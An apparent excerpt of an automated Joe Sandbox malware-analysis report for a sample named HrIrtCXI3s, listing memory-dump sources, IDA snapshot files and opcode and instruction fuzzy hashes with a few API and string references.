                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                      • Instruction ID: 23c5f1e792ec043489181202b8fa5bc7a4dfb014d00afc0b1cc1a0b94ffab45f
                                                      • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                      • Instruction Fuzzy Hash: 28919435B183118FCB19CE18C49016EBBE3BBCA314F1A992DD99697391DA31AC46CB85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.1973460711.0000000001951000.00000004.00000020.00020000.00000000.sdmp, Offset: 01951000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_1951000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2ce061b1d32f87fab30d1dfa64b04e9bb1e1185277d689d2c95a76fcebbabd
                                                      • Instruction ID: 9026c69232663e3f3995eedabca556c7963e6617a12f6572e1b86505c3cfd744
                                                      • Opcode Fuzzy Hash: 9c2ce061b1d32f87fab30d1dfa64b04e9bb1e1185277d689d2c95a76fcebbabd
                                                      • Instruction Fuzzy Hash: 7132B86254E3C15FD317A7B08D39A55BFB2AE13214B1E46DBD0C1CE4E3E2594A6AC323
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                      • Instruction ID: 9b0262122a3b89873edc4e83009b22940e1bfde071af4b535090fcf2d80ba217
                                                      • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                      • Instruction Fuzzy Hash: 1312B776F483154FC30CED6DC992359FAD7A7C8310F1A893EA959DB3A0E9B9EC014681
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb2aa7bb3ccb3d042e2727760b1568d57c8b9a4e09f33577fd9db2c8769a2254
                                                      • Instruction ID: 446dd39e5ce850759a9991ae163baf1da44ec363362a3bfea9ca0942d9fcc1d6
                                                      • Opcode Fuzzy Hash: bb2aa7bb3ccb3d042e2727760b1568d57c8b9a4e09f33577fd9db2c8769a2254
                                                      • Instruction Fuzzy Hash: 43E138309083168FD324CF18C4A0366BBE2BB86750F24852FD9958B395D77CDD46DB8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6e13ceb44b67778f24a02b921bb982675c425787d679aa0db36d5e53fccff81
                                                      • Instruction ID: 96621c4503011a7c82e2523bd3c9c31d6d0861270f7067421a5b7ef982329ecc
                                                      • Opcode Fuzzy Hash: f6e13ceb44b67778f24a02b921bb982675c425787d679aa0db36d5e53fccff81
                                                      • Instruction Fuzzy Hash: 2FC15CB1605625CBD328CF19E4A4265F7E1FF91314F25866DD5AA8F781CB38EAC1CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                      • Instruction ID: f91e451c38a1d068302dd5746cd715fa6b82181cd021363b586e590a4be55cc1
                                                      • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                      • Instruction Fuzzy Hash: ECA11571A183114FCB14DF2CC48062EBBE6BFCA350F19962DE595973D2E635DC458B81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.1974181847.000000000196C000.00000004.00000020.00020000.00000000.sdmp, Offset: 01951000, based on PE: false
                                                       • Associated: 00000000.00000003.1973460711.0000000001951000.00000004.00000020.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_1951000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8de2acb5b41a40bfd6f63f52aad027db7fbe630f2a67725d4ff9e8a5d02aaf3
                                                      • Instruction ID: 299cc751d2d26ca3ede2244315561f63cbf810eac86a871594294c2bb1c4946d
                                                      • Opcode Fuzzy Hash: a8de2acb5b41a40bfd6f63f52aad027db7fbe630f2a67725d4ff9e8a5d02aaf3
                                                      • Instruction Fuzzy Hash: 4031536198E3C28FD7434BB04875A943FB5AE4326171B05DBC884CF4A3E25C4C8AC772
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.1974181847.000000000196C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0195E000, based on PE: false
                                                       • Associated: 00000000.00000003.1973460711.0000000001951000.00000004.00000020.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_1951000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8de2acb5b41a40bfd6f63f52aad027db7fbe630f2a67725d4ff9e8a5d02aaf3
                                                      • Instruction ID: 299cc751d2d26ca3ede2244315561f63cbf810eac86a871594294c2bb1c4946d
                                                      • Opcode Fuzzy Hash: a8de2acb5b41a40bfd6f63f52aad027db7fbe630f2a67725d4ff9e8a5d02aaf3
                                                      • Instruction Fuzzy Hash: 4031536198E3C28FD7434BB04875A943FB5AE4326171B05DBC884CF4A3E25C4C8AC772
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                      • Instruction ID: d28c6a1f2034af8297f9dda31f7af7f5345f9c31e50f5d7c22f4bb20719b2d8d
                                                      • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                      • Instruction Fuzzy Hash: 6DA19435A001598FDF38DE29CC81BDA77A6FB89310F0A8625EC599F3D1EA30AD458781
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1f55fc2399a51ce8a50b403cd71cbf36bec06144de554ecc304493c17596468
                                                      • Instruction ID: e32aea79629cd10e39f1d77564d67f685b7ab0f406d2931b04b48e925aedf3c9
                                                      • Opcode Fuzzy Hash: c1f55fc2399a51ce8a50b403cd71cbf36bec06144de554ecc304493c17596468
                                                      • Instruction Fuzzy Hash: A9C1E571914B419BD722CF38C881BE6BBE1BFD9300F509A1DE9EAA6241EB706584CB51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb9e74cff1a5ce4215f6e1aa52fb36d7d33c8018feff82f7ffa5c856ecb6ac27
                                                      • Instruction ID: 22c21bf898711e7a09b3f668c9a70f4cd6376399b2ef26b34e1f9d9c78aaf0a2
                                                      • Opcode Fuzzy Hash: eb9e74cff1a5ce4215f6e1aa52fb36d7d33c8018feff82f7ffa5c856ecb6ac27
                                                      • Instruction Fuzzy Hash: 1C713F222089541BDB15492D48903B967D3FBC232FF59562AECE9C73C5C635CCCE9791
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7cb41620ec6ab54d771942d8e05afb0a322f3f2027be62c9a2bfe8adb0aec291
                                                      • Instruction ID: 842b2bacb3073ae662f091406c2091cf667a99620a2ba0b9b8879ec154d547d3
                                                      • Opcode Fuzzy Hash: 7cb41620ec6ab54d771942d8e05afb0a322f3f2027be62c9a2bfe8adb0aec291
                                                      • Instruction Fuzzy Hash: 7381D561D0978497E621AB35CA017FBB3E5AFA5344F099B29BD8C61113FB30B9E48712
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6313f44560d2054d5deb997567ae394557d78da6f4c048ebf0f26e163a772a5
                                                      • Instruction ID: 43ac46baab9ab0d6e6ef91069a3110e1bbbe529ba3cf247c92d1e25df342946f
                                                      • Opcode Fuzzy Hash: f6313f44560d2054d5deb997567ae394557d78da6f4c048ebf0f26e163a772a5
                                                      • Instruction Fuzzy Hash: 7371E532A08B25CBC7109F18E89072AB7E1FF99335F19866DE8D487391D735ED908B91
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b73b5c97e241b479750a4324bd19ae895bd01ef5ed9cc38c35bce0e8344155b3
                                                      • Instruction ID: ff813555f051d0492d406b76488339a4793b989e201e5e8330ef765a36b09e33
                                                      • Opcode Fuzzy Hash: b73b5c97e241b479750a4324bd19ae895bd01ef5ed9cc38c35bce0e8344155b3
                                                      • Instruction Fuzzy Hash: BC810972D18B828BD3149F28D8806BAB7A0FFDA314F145B5EE8E647782E7749581C7C1
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17ba2cd88835c928585dbd57282cba21541a79c3578eda7c4f4989dee69d056f
                                                      • Instruction ID: 4f6c8c0baf3d9d9b8338a87c3279d88a602cee33d93ade133f6ea629f249587b
                                                      • Opcode Fuzzy Hash: 17ba2cd88835c928585dbd57282cba21541a79c3578eda7c4f4989dee69d056f
                                                      • Instruction Fuzzy Hash: 6981E672D18B929BD3148F28C8806B6B7A0FFDA314F249B5EE8E647742F7749590C781
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14d3020132bc20fbbfe810734254675cad2bacacc8392b062541ad62db5e9147
                                                      • Instruction ID: 7f6d69dd09279760c117f7c7cd866fa33eeb5d0387ce9d7f977c98dc53d39f23
                                                      • Opcode Fuzzy Hash: 14d3020132bc20fbbfe810734254675cad2bacacc8392b062541ad62db5e9147
                                                      • Instruction Fuzzy Hash: F5716872D087898BD7118F288880269BBA2FFD6314F29837EF8D59B353E7759A41C741
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                      • Instruction ID: b7af57da6433f3daa10f96d4b329a952fb5590caec3fc8122bb4584d6efe45ca
                                                      • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                      • Instruction Fuzzy Hash: B031C431318B1A8BC718AD69C4C022AF6D3EBE8751F55873DE989C3380E9719C4D8682
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-784033777
                                                      • Opcode ID: 10a715da96ecf9828af49af4dfa4a83d8c6f53789b7dd0e844644c7dfc3ec04f
                                                      • Instruction ID: 8f3335ff6f40a2a1f804509e7cbf1293c026a00144d9e95cc7824c27f3b74116
                                                      • Opcode Fuzzy Hash: 10a715da96ecf9828af49af4dfa4a83d8c6f53789b7dd0e844644c7dfc3ec04f
                                                      • Instruction Fuzzy Hash: C2B146729083957BDB368A2488A577AFFD8FF55304F18C92EE8C5C6181EB35DC448B52
                                                      APIs
                                                      • if_indextoname.IPHLPAPI(C484002E,C483FFEB), ref: 005842FA
                                                      Strings
                                                      Similarity
                                                      • API ID: if_indextoname
                                                      • String ID: %$%lu
                                                      • API String ID: 1170979652-938625555
                                                      • Opcode ID: 5505a1f60e56f76a0a4efd51fa76e2f70ea2da1dca60e19cae7576a274e9e8f5
                                                      • Instruction ID: 441394e37607459484e4e32e7f435aac32d944b3afed8423e57dd1e0985fd7d2
                                                      • Opcode Fuzzy Hash: 5505a1f60e56f76a0a4efd51fa76e2f70ea2da1dca60e19cae7576a274e9e8f5
                                                      • Instruction Fuzzy Hash: B61190B550425227EB102510DC467FB3E54BBA5308F140829FD88E7243F6669C4ADFE2